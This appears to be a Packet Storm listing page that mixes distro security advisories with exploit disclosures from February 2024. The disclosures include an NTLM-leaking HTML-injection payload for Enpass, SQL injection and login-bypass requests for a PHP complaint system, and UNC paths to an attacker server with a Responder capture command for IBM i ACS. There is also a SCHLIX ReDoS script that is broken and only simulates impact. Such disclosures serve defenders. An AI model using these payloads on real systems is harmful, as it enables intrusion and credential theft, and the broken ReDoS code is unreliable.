Red Hat Security Advisory 2024-0768-03 - An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0768.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libmaxminddb security updateAdvisory ID:        RHSA-2024:0768-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0768Issue date:         2024-02-12Revision:           03CVE Names:          CVE-2020-28241====================================================================Summary: An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libmaxminddb package contains the MaxMind DB library.Security Fix(es):* libmaxminddb: improper initialization in dump_entry_data_list() in maxminddb.c (CVE-2020-28241)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-28241References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1895379

Red Hat Security Advisory 2024-0768-03

Enpass Desktop Application version 6.9.2 suffers from an html injection vulnerability.

    ====================================================================HTML Injection in Enpass Desktop Application (Version 6.9.2)Product:            Enpass Password ManagerVersion:            6.9.2Issue date:        2024-02-11Download:         https://www.enpass.io/beta/Discovered by Muhammad Danial====================================================================*Overview:*A vulnerability has been discovered in the Enpass Desktop applicationversion 6.9.2 for Linux and Windows, which could potentially lead to HTMLinjection attacks. This vulnerability may be exploited by an attacker toexecute malicious code and leak NTLMv2 hashes, compromising the securityand privacy of affected users.*Vulnerability Details:*The vulnerability exists in the handling of notes within the Enpass Desktopapplication. By crafting a malicious note containing a specially craftedpayload such as <img src="http://attacker_ip/?c=" />, an attacker caninject arbitrary HTML code into the note. When the victim opens themalicious note shared by the attacker, the HTML injection payload isexecuted, allowing the attacker to capture the victim's NTLMv2 hashes andusername through their Enpass Desktop application.*Impact:*Successful exploitation of this vulnerability could result in the leakageof usernames and NTLMv2 hashes.

Enpass Desktop Application 6.9.2 HTML Injection

Complaint Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities# Date: 02/09/2-24# Exploit Author: Diyar Saadi# Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7259# Version: V 2.0# Tested on: Windows 11 + XAMPP 8.0.301- SQL Injection## Description ##Multiple SQL injection vulnerabilities have been identified in the Complaint Management System V 2.0. These vulnerabilities allow an attacker to manipulate SQL queries through user-controlled input, potentially leading to unauthorized access or data disclosure , The vulnerable code is in the `complaint-details.php ` file within the `admin` directory. The `cid` parameter .# Proof Of Ceoncept ##--> During forward the payload the response time is expand at least 5 second .--> Payload: 1' AND SLEEP(5) --Request :httpGET /admin/complaint-details.php?cid=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpSec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close# SQL Injection Vulnerability in User Authentications ### Proof Of Concept ##--> Attackers can bypass admin panel by forward the payload .--> Payload : admin'or'1-- from username field and any letter like pwn from password field then click sign in .--> Enjoy :xRequest :POST /admin/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpContent-Length: 46Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://localhost/admin/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: closeusername=admin%27or%271--&password=pwn&submit=Greetz!Sent with [Proton Mail](https://proton.me/) secure email.

Complaint Management System 2.0 SQL Injection

SCHLIX version 2.2.8-1 suffers from a REGEX processing denial of service vulnerability.

# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service  
# Date: 02/10/2024  
# Exploit Author: Diyar Saadi  
# Vendor Homepage: https://www.schlix.com  
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html  
# Version: v2.2.8-1  
# Tested on: Windows 11 + XAMPP

## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…

## Proof Of Concept ##

import requests  
import re  
import time

def test_redos(url, payload):  
try:  
vulnerable_regex = r'(.*a){x} for x > 10'

match = re.match(vulnerable_regex, payload)

if match:  
print("Vulnerability not triggered.")  
else:  
print("Vulnerability may be present. Simulating 30-second impact...")

for _ in range(6):  
time.sleep(5)  
print("Simulating impact...")

print("Simulated impact duration completed.")

except re.error:  
print("Error in regex pattern.")

try:  
response = requests.get(url)  
if response.status_code == 200:  
print("Service is up.")  
else:  
print("Service may be down or inaccessible.")  
except requests.RequestException as e:  
print(f"HTTP Request Error: {str(e)}")

if __name__ == "__main__":  
target_url = 'http://localhost'

payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

test_redos(target_url, payload)

Sent with [Proton Mail](https://proton.me/) secure email.

SCHLIX 2.2.8-1 Denial Of Service

Gentoo Linux Security Advisory 202402-11 - Multiple denial of service vulnerabilities have been found in libxml2. Versions greater than or equal to 2.12.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libxml2: Multiple Vulnerabilities  
     Date: February 09, 2024  
     Bugs: #904202, #905399, #915351, #923806  
       ID: 202402-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple denial of service vulnerabilities have been found in libxml2.

Background  
==========

libxml2 is the XML C parser and toolkit developed for the GNOME project.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/libxml2  < 2.12.5      >= 2.12.5

Description  
===========

Multiple vulnerabilities have been discovered in libxml2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libxml2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.12.5"

If you cannot update to libxml2-2.12 yet you can update to the latest  
2.11 version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.11.7 =dev-libs/libxml2-2.11*"

References  
==========

[ 1 ] CVE-2023-28484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28484  
[ 2 ] CVE-2023-29469  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29469  
[ 3 ] CVE-2023-45322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45322  
[ 4 ] CVE-2024-25062  
      https://nvd.nist.gov/vuln/detail/CVE-2024-25062

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-11

Debian Linux Security Advisory 5618-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. An anonymous researcher discovered that a maliciously crafted webpage may be able to fingerprint the user. Wangtaiyu discovered that processing web content may lead to arbitrary code execution. Apple discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5618-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 08, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-23206 CVE-2024-23213 CVE-2024-23222

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-23206

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23213

    Wangtaiyu discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2024-23222

    Apple discovered that processing maliciously crafted web content  
    may lead to arbitrary code execution. Apple is aware of a report  
    that this issue may have been exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.5-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.5-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmXFXGQACgkQAAyEYu0C  
2AJWJA//fFEMVOvrgBf8I2Nnz37Bm/jR4IRM52osjsI6I23tjJ1vA9UR7Y/03QGN  
qOzfOsb6wcRGZfYdEy945N6vf/XN3opl44ApyJ6RHStbQ8EuTw+IXVSKs49x6FBC  
P7glTc3I4R5gYpOKDwc/jQwkB6VeCYPq0LeqgVNx2/Ja0eJ3KUEjXo+yYJbowRj+  
oiR9R+WKIEnz7BdxMbOLrlHc9CpR3UynozFprFha8bKNlyJAq/hwsO546NgYnSQH  
+n/hAad1NDvcptljLHrXjw/GYTVc2lEGoFFr8H8EDVdWrtzSlecHenthIxfjoKL9  
4eWGvilyZJGAKvtlaNRCFNorHTsAcqRUYhDT87TNScU+ONwdk3tdl9d4F/CcTylA  
7ZQGQ1OQk2f5h/E2Ns1CD0KE64+Qv4Eima/A7VNDKc2hXPNavaekIbziVKEJ4r+m  
ypJrJDm+RLeOcDKuyxfz6REQvAOinjMnfPQhMXRCdk4vz3RXl9bEpoao35C2rtLe  
HcL3/tg24hOooj6NJYQRuiKfmrZKhHivNrg4QJ/71Y1/JXtlmLiol6h8nfKKvb19  
ObFGbF27htKmSGXR3Oig5tQWcjhnbH4CSqXoTOYwDPRgb9dutViclKu605A97Fm5  
l5U0fyIT8mwkN/thk8KOE1AtNC2n90Y9Yx/gBPFRypHN+CBQCbY=  
=Lfkz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5618-1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 5.1.0

IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

[Vendor]  
www.ibm.com

[Product]  
IBM i Access Client Solutions

[Versions]  
All

[Remediation/Fixes]  
None

[Vulnerability Type]  
Remote Credential Theft

[CVE Reference]  
CVE-2024-22318

[Security Issue]  
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.  
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.  
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.  
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]  
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]  
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]  
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:  
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]  
ID=WS  
Version=9  
[Telnet5250]  
AssociatedPrinterStartMinimized=N  
AssociatedPrinterTimeout=0  
SSLClientAuthentication=Y  
HostName=PWN  
AssociatedPrinterClose=N  
Security=CA400  
CertSelection=AUTOSELECT  
AutoReconnect=Y  
[KeepAlive]  
KeepAliveTimeOut=0  
[Keyboard]  
IBMDefaultKeyboard=N  
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c  
[Communication]  
Link=telnet5250

[Network Access]  
Remote

[Severity]  
Medium

[Disclosure Timeline]  
Vendor Notification:  December 14, 2023  
Vendor Addresses Issue: February 7, 2024  
February 8, 2024 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

IBM i Access Client Solutions Remote Credential Theft

Ubuntu Security Notice 6628-1 - Quentin Minster discovered that a race condition existed in the KSMBD implementation in the Linux kernel when handling sessions operations. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6628-1February 09, 2024linux-intel-iotg vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-intel-iotg: Linux kernel for Intel IoT platformsDetails:Quentin Minster discovered that a race condition existed in the KSMBDimplementation in the Linux kernel when handling sessions operations. Aremote attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-32250, CVE-2023-32252,CVE-2023-32257)Marek Marczykowski-Górecki discovered that the Xen event channelinfrastructure implementation in the Linux kernel contained a racecondition. An attacker in a guest VM could possibly use this to cause adenial of service (paravirtualized device unavailability). (CVE-2023-34324)Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driverin the Linux kernel during device removal. A privileged attacker could usethis to cause a denial of service (system crash). (CVE-2023-35827)Tom Dohrmann discovered that the Secure Encrypted Virtualization (SEV)implementation for AMD processors in the Linux kernel contained a racecondition when accessing MMIO registers. A local attacker in a SEV guest VMcould possibly use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-46813)It was discovered that the Microchip USB Ethernet driver in the Linuxkernel contained a race condition during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could use this tocause a denial of service (system crash). (CVE-2023-6039)Lin Ma discovered that the netfilter subsystem in the Linux kernel did notproperly validate network family support while creating a new netfiltertable. A local attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6040)It was discovered that the TLS subsystem in the Linux kernel did notproperly perform cryptographic operations in some situations, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2023-6176)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate the server frame size in certainsituation, leading to an out-of-bounds read vulnerability. An attackercould use this to construct a malicious CIFS image that, when operated on,could cause a denial of service (system crash) or possibly expose sensitiveinformation. (CVE-2023-6606)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle dynset expressions passed from userspace, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash). (CVE-2023-6622)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle inactive elements in its PIPAPO data structure, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-6817)Budimir Markovic, Lucas De Marchi, and Pengfei Xu discovered that the perfsubsystem in the Linux kernel did not properly validate all event sizeswhen attaching new events, leading to an out-of-bounds write vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6931)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Kevin Rich discovered that the netfilter subsystem in the Linux kernel didnot properly check deactivated elements in certain situations, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-0193)It was discovered that the TIPC protocol implementation in the Linux kerneldid not properly handle locking during tipc_crypto_key_revoke() operations.A local attacker could use this to cause a denial of service (kerneldeadlock). (CVE-2024-0641)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1047-intel-iotg  5.15.0-1047.53   linux-image-intel-iotg          5.15.0.1047.47After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6628-1   CVE-2023-32250, CVE-2023-32252, CVE-2023-32257, CVE-2023-34324,   CVE-2023-35827, CVE-2023-46813, CVE-2023-6039, CVE-2023-6040,   CVE-2023-6176, CVE-2023-6606, CVE-2023-6622, CVE-2023-6817,   CVE-2023-6931, CVE-2023-6932, CVE-2024-0193, CVE-2024-0641Package Information:   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1047.53

Ubuntu Security Notice USN-6628-1

Red Hat Security Advisory 2024-0764-03 - An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0764.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: container-tools:rhel8 security updateAdvisory ID:        RHSA-2024:0764-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0764Issue date:         2024-02-09Revision:           03CVE Names:          CVE-2024-21626====================================================================Summary: An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* runc: file descriptor leak (CVE-2024-21626)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21626References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2024-001https://bugzilla.redhat.com/show_bug.cgi?id=2258725